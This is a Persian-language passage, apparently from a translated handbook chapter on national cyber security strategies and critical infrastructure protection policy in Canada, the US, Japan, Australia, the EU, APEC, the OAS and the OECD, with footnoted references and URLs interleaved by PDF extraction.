‫ﻛﺎﻧﺎﺩﺍ ﺑﺪﻧﺒﺎﻝ ﺍﻧﺘﺸﺎﺭ ﻧﺘﺎﻳﺞ ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺗﻮﺳـﻂ ﻛﻤﻴﺘـﺔ ﺩﺍﺧﻠـﻲ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ‪ ،٣٤‬ﺩﻭﻟﺖ ﻳﻚ ﻣﺮﻛـﺰ ﻫﻤﻜـﺎﺭﻱ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺣﻔﺎﻇﺖ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺍﺭﺯﻳـﺎﺑﻲ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﺑﺮﺭﺳـﻲ‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﻳﻚ ﺩﻓﺘﺮ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺣﻴﺎﺗﻲ ﻭ ﺁﻣﺎﺩﮔﻲ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩﺁﻭﺭﺩﻥ ﻳـﻚ‬
‫‪٣٥‬‬
‫ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﺗﺄﺳﻴﺲ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‪ ،‬ﻛﻠﻴﻨﺘـﻮﻥ ﻭ ﺑـﻮﺵ ﺑـﺎ ﺗﺄﺳـﻴﺲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ‪ ،‬ﭼﻨـﺪ ﮔـﺎﻡ ﻋﻤﻠـﻲ ﺑﺮﺩﺍﺷـﺘﻨﺪ‪ .‬ﺩﺭ‬
‫ﻃﺮﺣﻬﺎ ﺧﻮﺍﺳﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻠﻲ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ‬
‫ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺗﻬﻴﻪ ﺷﻮﺩ‪ ٣٦.‬ﺍﻳﻦ ﺩﺳـﺘﻮﺭﺍﺕ ﺭﺋـﻴﺲﺟﻤﻬـﻮﺭ‪ ،‬ﺑـﻪ‬
‫‪۳۲‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺘﺎﺏ ﻣﻌﺮﻓـﻲ ﺷـﺪﻩ ﺩﺭ ﭘـﺎﻭﺭﻗﻲ ﺷـﻤﺎﺭﻩ ‪۱۷‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪President's Critical Infrastructure Protection‬‬
‫‪Board‬‬
‫‪Critical Infrastructure Protection Task Force‬‬
‫& ‪Office of Critical Infrastructure Protection‬‬
‫]‪Emergency Prepareness [Canada‬‬
‫‪http://www.ocipep.gc.ca/critical/nciap/disc_e.a‬‬
‫‪sp‬‬
‫‪۳۶‬‬
‫ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘــﻲ ﻣﺠــﻮﺯ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ‬
‫ﺧﺼﻮﺻﻲ ﺭﺍ ﻧﻤﻲ ﺩﺍﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻮﺽ ﺑﺮ ﺿﺮﻭﺭﺕ ﻭﺟﻮﺩ ﻫﻤﻜﺎﺭﻱ‬
‫ﻭ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺗﺄﻛﻴـﺪ‬
‫ﺩﺍﺷﺖ‪ .‬ﺳـﺎﻳﺮ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺭﻫﺒـﺮﻱ ﺩﺭ ﻗـﺴﻤﺖ "ﻓﺮﻣﺎﻧـﺪﻫﻲ ﻭ‬
‫ﺳﺎﺯﻣﺎﻥ" ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻓﺎﺯ ﺳﻮﻡ ﺷﺎﻣﻞ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺍﺳـﺖ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺩﺭ ﺑـﺎﻻ‬
‫ﺍﺷﺎﺭﻩ ﺷﺪ‪ ،‬ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺳـﻨﺪ‬
‫ﻣﺠﺰﺍ ﻭ ﻳـﺎ ﻗـﺴﻤﺘﻲ ﺍﺯ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ ‪ ICT‬ﺑﺎﺷـﺪ‪ .‬ﻧﻜﺘـﺔ‬
‫ﻛﻠﻴﺪﻱ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﮊﺍﭘﻦ ﻛﻪ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻛﻠـﻲ ‪ICT‬‬
‫ﺍﺩﻏﺎﻡ ﻛـﺮﺩﻩ‪ ،‬ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ "ﻣﺮﻛـﺰ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ" ﺩﺭ ﻛﺎﺑﻴﻨـﻪ ﻭ "ﺷـﻮﺭﺍﻱ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ" ﻛﻪ ﺍﺯ ﺑﻴﺴﺖ ﺻﺎﺣﺒﻨﻈﺮ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺑـﻮﺩ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬
‫ﺭﺳﻴﺪ‪ ،‬ﻭ ﺍﺻﺎﻟﺘﹰﺎ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺗﺄﺳﻴﺲ ﺷﺪ ﻛﻪ ﺗﻮﺍﻧﺎﺋﻴﻬﺎﻱ ﺩﻭﻟﺖ‬
‫‪٣٧‬‬
‫ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﺗﺮﻛﻴﺐ ﻛﻨﺪ‪.‬‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻳﻚ ﺳﻨﺪ ﻣﺠﺰﺍ ﺍﺳـﺖ ﻭ‬
‫ﺗﻬﻴﺔ ﺁﻥ ﻣﺤﺼﻮﻝ ﻓﺮﺁﻳﻨﺪﻱ ﻃﻮﻻﻧﻲ ﺍﺯ ﺗﺒﺎﺩﻝﻧﻈﺮﻫﺎﻱ ﻋﻤـﻮﻣﻲ‬
‫ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺷﻮﺭﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﻣـﺪﻳﺮﻳﺖ ﺷـﺪﻩ‬
‫ﺍﺳﺖ‪ .‬ﻧﮕﺎﺭﺵ ﺍﻭﻝ ﺍﺳﻨﺎﺩ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۰‬ﻣﻨﺘـﺸﺮ‬
‫ﺷﺪ‪ ،‬ﻧﺴﺨﻪ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪﺓ ﺁﻥ ﺩﺭ ﭘـﺎﺋﻴﺰ ﺳـﺎﻝ ‪ ،۲۰۰۲‬ﻭ ﻧﮕـﺎﺭﺵ‬
‫ﺁﺧﺮ ﺁﻥ ﺩﺭ ﻓﻮﺭﻳﺔ ‪ ٣٨.۲۰۰۳‬ﺩﺭ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ ﻃﺮﺣﻬـﺎﻱ‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺎﻭﺭﻩﻫﺎﻱ ﺗﻔﺼﻴﻠﻲ ﺩﺭ ﺩﻭﻟﺖ ﻭ ﻣﻴﺎﻥ‬
‫ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪ‪ .‬ﺩﻩ ﻧﺸﺴﺖ ﻋﻤـﻮﻣﻲ ﻧﻴـﺰ‬
‫ﺩﺭ ﺷﻬﺮﻫﺎﻱ ﻣﻬﻢ ﺟﻬﺎﻥ ﺑﻤﻨﻈـﻮﺭ ﺟﻤـﻊﺁﻭﺭﻱ ﻧﻴﺮﻭﻫـﺎﻱ ﻣـﻮﺭﺩ‬
‫‪33‬‬
‫‪Council, October 8, 2001,‬‬
‫‪http://fas.org/irp/offdocs/eo/eo-13228.htm‬‬
‫‪E.O. 13231, Critical Infrastructure Protection‬‬
‫‪in the Information Age, October 16, 2001,‬‬
‫‪http://ciao.gov/News/EOonCriticalInfrastructur‬‬
‫‪eProtection101601.html‬‬
‫‪e-Japan Security Policy Program, March 29,‬‬
‫‪2001,‬‬
‫‪http://www.kantei.go.jp/foreign/it/network/priori‬‬
‫‪ty-all/index.html‬‬
‫‪34‬‬
‫‪35‬‬
‫ﻛﻠﻴﻨﺘﻮﻥ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ "ﺗﺼﻤﻴﻤﺎﺕ ﺭﺍﻫﺒـﺮﺩﻱ ﺭﺋـﻴﺲ ﺟﻤﻬـﻮﺭ" )‪ (PDD‬ﻣﻨﺘـﺸﺮ‬
‫ﻛﺮﺩ‪:‬‬
‫‪63: Critical Infrastructure Protection, May 22,‬‬
‫‪1998,‬‬
‫‪http://www.fas.org/irp/offdocs/pdd-63.htm‬‬
‫‪62: Protection Against Unconventional‬‬
‫‪Threats to the Homeland & Americans‬‬
‫‪Overseas, May 22, 1998,‬‬
‫‪http://www.fas.org/irp/offdocs/pdd-62.htm‬‬
‫ﺑﻌﺪ ﺍﺯ ‪ ۱۱‬ﺳﭙﺘﺎﻣﺒﺮ ‪ ۲۰۰۱‬ﻧﻴﺰ ﺑﻮﺵ ﺩﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺍﺟﺮﺍﻳﻲ ﺍﻣﻀﺎ ﻛﺮﺩ‬
‫ﻛﻪ ﻃﺒﻖ ﺁﻧﻬـﺎ ﻋﻤﻠﻴـﺎﺕ ﻣﺠـﺪﺩﹰﺍ ﻣﻜﺎﻧﻴـﺎﺑﻲ ﻣـﻲﺷـﺪ ﻭ ﻣﻮﺟﻮﺩﻳﺘﻬـﺎﻱ‬
‫ﺟﺪﻳﺪﻱ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ‬
‫ﺑﻮﺟﻮﺩ ﻣﻲﺁﻣﺪ‪:‬‬
‫‪E.O. 13228, Establishing the Office of‬‬
‫‪Homeland Security & the Homeland Security‬‬
‫‪۳۹‬‬
‫ﺁﺧﺮﻳﻦ ﻧﺴﺨﻪ ﺁﻥ ﻋﺒﺎﺭﺗﺴﺖ ﺍﺯ‬
‫‪The National Strategy to Secure Cyberspace:‬‬
‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬
‫‪nal_Cyberspace_Strategy.pdf.‬‬
‫ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺑﺎ ﻛﻤﻚ ﺍﺯ ﺳﻨﺪ ﺯﻳﺮ ﺗﻬﻴﻪ ﺷﺪ‪:‬‬
‫‪The National Strategy for Physical Protection‬‬
‫‪of Critical Infrastructures & Key Assets:‬‬
‫‪http://www.dhs.gov/interweb/assetlibrary/Phys‬‬
‫‪ical-Strategy.pdf.‬‬
‫ﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺍﺟﺰﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺭﺍ ﺷﺮﺡ ﻣـﻲﺩﻫﻨـﺪ ﻭ‬
‫ﺩﺭ ﺟﻮﻻﻱ ‪ ۲۰۰۲‬ﺗﻮﺳﻂ ﻛﺎﺥ ﺳﻔﻴﺪ ﻣﻨﺘﺸﺮ ﺷﺪﻧﺪ‪.‬‬
‫‪37‬‬
‫‪٢٣٩‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺑﺮﭘﺎ ﮔﺸﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻧﺸـﺴﺘﻬﺎ‬
‫ﮔﺮﻭﻩ ﻫﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ ‪ -‬ﻣﺪﻧﻲ‪ ،‬ﻫﻤﻜﺎﺭﺍﻥ ﺗﺠﺎﺭﻱ‪ ،‬ﻭ ﺷـﺮﻛﺘﻬﺎ ﺑـﺎ‬
‫ﻳﻜﺪﻳﮕﺮ ﻣﺸﻮﺭﺕ ﻛﺮﺩﻧﺪ‪ .‬ﺍﺯ ﺩﻳﮕﺮ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫‪٣٩‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﺳﻄﺢ ﻣﻨﻄﻘﻪﺍﻱ ﻧﻴﺰ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎ ﻓﻌﺎﻟﻴﺘﻬـﺎﻳﻲ‬
‫ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺧﻮﺩ‬
‫ﺭﺍ ﻧﻪ ﺗﻨﻬﺎ ﺩﺭ ﻳﻚ ﺳﻨﺪ ﻭﺍﺣﺪ‪ ،‬ﺑﻠﻜﻪ ﻃﻲ ﭼﻨـﺪﻳﻦ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ‬
‫ﺳﻠﺴﻠﻪ ﺍﺳﻨﺎﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﻃﺮﺣﻬﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﻛﻤﻴـﺴﻴﻮﻥ ﺍﺭﻭﭘـﺎ‬
‫‪٤١‬‬
‫‪٤٠‬‬
‫ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ‪ .‬ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺁﺳـﻴﺎ)‪(APEC‬‬
‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻨﻄﻘﻪﺍﻱ ﻛﻪ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ ﻛـﺎﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ ﺩﻭﺭ )‪ ٤٢(TEL‬ﻭ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﻓﻌـﺎﻝ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ ٤٣.‬ﺳﺎﺯﻣﺎﻥ‬
‫ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜﺎ )‪ ٤٤(OAS‬ﻣﺴﺌﻮﻟﻴﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﺭﺍ ﻧﻴﺰ‬
‫ﺑــﺮ ﻋﻬــﺪﻩ ﺩﺍﺭﺩ‪ ٤٥.‬ﺩﺭ ﮊﻭﺋــﻦ ‪ ۲۰۰۳‬ﻣﺠﻤــﻊ ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ‬
‫ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜـﺎ ﻗﻄﻌﻨﺎﻣـﻪﺍﻱ ﺑـﺮﺍﻱ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺩﺍﺧﻠـﻲ‬
‫ﺑﻌﺪ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﺗﻼﺷﻬﺎ‪ ،‬ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻣﻮﺿـﻮﻋﻲ ﻫﻤﺎﻫﻨـﮓ ﻭ‬
‫ﻳﻜﭙﺎﺭﭼــﻪ ﺍﺯ ﺍﺳــﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺩﺭ ﺳــﻄﻮﺡ ﻣﻠــﻲ‪،‬‬
‫ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫•‬
‫ﻣﺸﺎﺭﻛﺖ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ‬
‫ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﻫﻤﻜـﺎﺭﻱ ﺑﺨـﺸﻬﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ‬
‫ﺧﺼﻮﺻﻲ ﺍﺳﺖ‪ ٤٩.‬ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﺻـﻠﻲ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ‬
‫ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪.‬‬
‫•‬
‫ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ‬
‫"ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻨــﺪﮔﺎﻥ ﺍﺯ ﺷــﺒﻜﻪ ﺍﺯ ﺟﻤﻠــﻪ ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﮔﺎﻥ‪،‬‬
‫ﺭﺍﻫﺒﺮﺍﻥ‪ ،‬ﺍﭘﺮﺍﺗﻮﺭﻫﺎ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻭﺍﺭﺩﻩ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ﻭ‬
‫‪39‬‬
‫‪40‬‬
‫‪۴۳‬‬
‫‪41‬‬
‫‪42‬‬
‫ﺍﻳﻦ ﺳﻨﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.apecsec.org.sg/content/apec/apec‬‬
‫‪_groups/working_groups/telecommunications‬‬
‫‪_and_information.html‬‬
‫ﺩﺭ ﺍﻛﺘﺒــﺮ ‪ ،۲۰۰۲‬ﻭﺯﻳــﺮﺍﻥ ‪ APEC‬ﺍﻫﻤﻴــﺖ ﺣﻔﺎﻇــﺖ ﺍﺯ ﻳﻜﭙــﺎﺭﭼﮕﻲ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ‪ APEC‬ﺭﺍ ﺩﺭ ﻋـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺘﻨﺪ‪ .‬ﺩﺭ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‪ ،‬ﺁﻧـﺎﻥ ﺍﺯ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ‪ TEL‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ ﻭ ﺑﻪ ﻣـﺴﺌﻮﻟﻴﻦ ﺩﺳـﺘﻮﺭ‬
‫ﺩﺍﺩﻧﺪ ﻛﻪ ﺁﻧﺮﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ‪:‬‬
‫‪۴۵‬‬
‫‪http://203.127.220.67/apec/ministerial_statem‬‬
‫‪ents/annual_ministerial/2002_14th_apec_mini‬‬
‫‪sterial.html#policies‬‬
‫‪44 Organization of American States‬‬
‫ﻭﻇﻴﻔﻪ ﺍﻭﻟﻴﻪ ‪ OAS‬ﺟﻨﺎﻳﺎﺕ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.oas.org/juridico/english/cyber_exp‬‬
‫‪erts.htm‬‬
‫‪Organization for Eonomic Cooperation and‬‬
‫‪Development‬‬
‫& ‪Organization for Economic Cooperation‬‬
‫‪Development, OECD Guidelines for the‬‬
‫‪Security of Information Systems & Networks:‬‬
‫‪Towards a Culture of Security, July 25, 2002,‬‬
‫‪http://www.oecd.org/pdf/M00034000/M000340‬‬
‫‪00.pdf‬‬
‫‪Implementation Plans for the OECD‬‬
‫‪Guidelines for the Security of Information‬‬
‫‪Systems & Networks: Towards a Culture of‬‬
‫‪Security, Organization for Economic‬‬
‫‪Cooperation & Development, Working Party‬‬
‫‪on Information Security & Privacy,‬‬
‫‪DSTI/ICCP/REG(2002)6‬‬
‫‪/FINAL, Jan. 21, 2003,‬‬
‫‪http://www.olis.oecd.org/olis/2002doc.nsf/Link‬‬
‫‪To/dsti-iccp-reg(2002)6-final‬‬
‫‪47‬‬
‫ﻗﻄﻌﻨﺎﻣﻪ ﺩﺭ ﺟﻠﺴﻪ ﭼﻬﺎﺭﻡ ﺩﺭ ‪ ۱۰‬ﮊﻭﺋﻦ ‪ ۲۰۰۳‬ﺑﻪ ﺗﺼﻮﻳﺐ ﺭﺳﻴﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﺍﺻﻞ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ‬
‫ﻛﻨﻴﺪ‪ .‬ﻧﺴﺨﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺍﺳﺖ‪:‬‬
‫‪http://www.infodev-security.net/handbook‬‬
‫‪Asia Pacific Economic Cooperation‬‬
‫‪Telecommunications and Information Working‬‬
‫‪Group‬‬
‫‪Development of an Inter-American Strategy to‬‬
‫‪Combat Threats to Cybersecurity, AG/RES.‬‬
‫)‪1939 (XXXIII-0/03‬‬
‫‪46‬‬
‫‪۴۹‬‬
‫ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﻩ ﺟﺰﺋﻴﺎﺕ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ‪:‬‬
‫‪APEC, "Statement on the Security of‬‬
‫"‪Information & Communications Infrastructure,‬‬
‫‪Fifth‬‬
‫‪APEC‬‬
‫‪Ministerial‬‬
‫‪Meeting‬‬
‫‪on‬‬
‫‪Telecommunications‬‬
‫‪ans‬‬
‫‪Information‬‬
‫‪Industry,Shanghai, China, May 29-30, 2002,‬‬
‫‪http://www.apecsec.org.sg/virtualib/minismtg/t‬‬
‫‪elminAnnexB_SICT.html‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﺍﺻﻞ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ‬
‫ﻛﻨﻴﺪ‪ .‬ﻧﺴﺨﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺘﺎﺏ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬
‫‪http://www.infodev-security.net/handbook.‬‬
‫‪48‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫‪E-Security National Agenda [Australia],‬‬
‫‪September 2001,‬‬
‫‪http://www.noie.gov.au/projects/confidence/Pr‬‬
‫‪otecting/nat_agenda.htm‬‬
‫‪European Commission, Proposal for a‬‬
‫‪Regulation of the European Parliament & of‬‬
‫‪the Council - Establishing the European‬‬
‫‪Network & Information Security Agency, Feb.‬‬
‫‪11, 2003, COM (2003) 63 Final, 2003/0032‬‬
‫‪(COD),‬‬
‫‪http://europa.eu.int/information_society/eeuro‬‬
‫‪pe/action_plan/safe/documents/nisa_en.pdf‬‬
‫ﺁﻣﺮﻳﻜﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺳﺘﻴﺎﺑﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ‬
